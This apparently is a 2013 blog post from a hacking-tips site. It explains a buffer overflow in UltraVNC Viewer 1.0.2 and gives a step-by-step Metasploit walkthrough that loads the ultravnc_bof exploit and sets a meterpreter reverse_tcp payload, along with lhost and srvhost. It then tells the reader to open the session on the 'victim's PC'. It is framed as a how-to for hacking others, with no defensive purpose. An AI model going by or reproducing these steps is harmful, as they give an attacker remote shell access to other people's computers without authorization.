Hack Remote Windows 7 PC Using UltraVNC Buffer Overflow Attack ~ House of Tips

Friday 11 January 2013

Hack Remote Windows 7 PC Using UltraVNC Buffer Overflow Attack

01:01 Unknown No comments

Hack Remote Windows 7 PC Using UltraVNC Buffer Overflow Attack

fEatuRe f diZ xploiT :)

This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack

Exploit Targets

0 – Windows XP SP3 (default)
1-Windows XP SP2
2-Windows 7

Requirement
Attacker: Backtrack 5
Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/vnc/ultravnc_bof

Msf exploit (ultravnc_bof)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ultravnc_bof)>set lhost xxx.xxx.xxx (IP of Local Host)

Msf exploit (ultravnc_bof)>set srvhost xxx.xxx.xxx (This must be an address on the local machine)

Msf exploit (ultravnc_bof)>exploit

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Posted in: